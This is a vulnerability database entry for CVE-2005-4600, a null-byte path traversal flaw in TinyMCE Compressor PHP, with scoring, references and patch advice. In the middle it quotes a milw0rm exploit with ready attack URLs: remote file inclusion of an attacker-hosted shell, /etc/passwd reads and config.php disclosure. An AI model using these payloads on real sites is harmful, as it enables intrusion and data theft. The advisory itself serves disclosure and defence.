CVE-2005-4600
CVSS 6.4
Published: 2005-12-31 00:00:00
Revised: 2008-09-05 16:57:17

[Original] Directory traversal vulnerability in tiny_mce_gzip.php in TinyMCE Compressor PHP before 1.06 allows remote attackers to read or include arbitrary files via a trailing null byte (%00) in the (1) theme, (2) language, (3) plugins, or (4) lang parameter.


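[CNNVD] TinyMCE Compressor multiple directory traversal vulnerabilities (CNNVD-200512-640)

        tiny_mce_gzip.php in TinyMCE Compressor PHP versions before 1.06 allows remote attackers to read or include arbitrary files via a trailing null byte (%00) in the (1) theme, (2) language, (3) plugins, or (4) lang parameter.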

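- CVSS (Base Score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: NETWORK [the attacker does not need internal-network or local access]
Authentication: NONE [exploitation requires no authentication]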

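- CWE (Weakness Category)

CWE-22 [Improper limitation of a pathname (path traversal)]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4600
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4600
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-640
(Official data source) CNNVD

- Other links and resources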

http://www.securityfocus.com/bid/16083
(PATCH)  BID  16083
http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2233
(PATCH)  CONFIRM  http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2233
http://secunia.com/advisories/18262
(VENDOR_ADVISORY)  SECUNIA  18262
http://xforce.iss.net/xforce/xfdb/36736
(UNKNOWN)  XF  izicontents-tinymcegzip-directory-traversal(36736)
http://www.securityfocus.com/archive/1/archive/1/420543/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051229 Advisory 26/2005: TinyMCE Compressor Vulnerabilities
http://www.osvdb.org/22116
(UNKNOWN)  OSVDB  22116
http://www.milw0rm.com/exploits/4441
(UNKNOWN)  MILW0RM  4441
http://www.hardened-php.net/advisory_262005.111.html
(VENDOR_ADVISORY)  MISC  http://www.hardened-php.net/advisory_262005.111.html
http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2244
(UNKNOWN)  CONFIRM  http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2244
http://securitytracker.com/id?1015424
(UNKNOWN)  SECTRACK  1015424
http://securityreason.com/securityalert/306
(UNKNOWN)  SREASON  306

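- Vulnerability information

TinyMCE Compressor multiple directory traversal vulnerabilities
Medium severity  Input validation
2005-12-31 00:00:00 2006-01-03 00:00:00
Remote
        tiny_mce_gzip.php in TinyMCE Compressor PHP versions before 1.06 allows remote attackers to read or include arbitrary files via a trailing null byte (%00) in the (1) theme, (2) language, (3) plugins, or (4) lang parameter.

- Advisory and patch

        The vendor has released an upgrade patch that fixes this security issue. Patch link:
        http://tinymce.moxiecode.com/download.php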

- Vulnerability information (4441)

iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities (EDBID:4441)
php webapps
2007-09-21 Verified
0 irk4z
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities          #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.izicontents.com/download/iziContents1RC6.zip                    #
#                                                                              #
# greetz: cOndemned, kacper ;>                                                 #


# remote file inclusion:
 http://[site]/[path]/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://[shell]? 
 
# local file inclusion:
 http://[site]/[path]/modules/poll/poll_summary.php?rootdp=zZz&admin_home=/etc/passwd%00
 http://[site]/[path]/include/db.php?rootdp=/etc/passwd%00
 
# remote file disclosure:
 http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00

# milw0rm.com [2007-09-21]
		

- Vulnerability information

22116
TinyMCE Compressor tiny_mce_gzip.php Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public, Exploit Unknown Vendor Verified

- Vulnerability description

TinyMCE Compressor contains a flaw that allows a remote attacker to view files outside of the web path. The issue is due to the tiny_mce_gzip.php script not sanitizing input to the 'theme', 'language', 'plugins', or 'lang' parameters. By requesting a file and appending a null byte (%00), an attacker can access any file on the system that the web server has privileges to read.

- Timeline

2005-12-29 2005-12-27
Unknown Unknown

- Solution

Upgrade to version 1.0.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

 

 
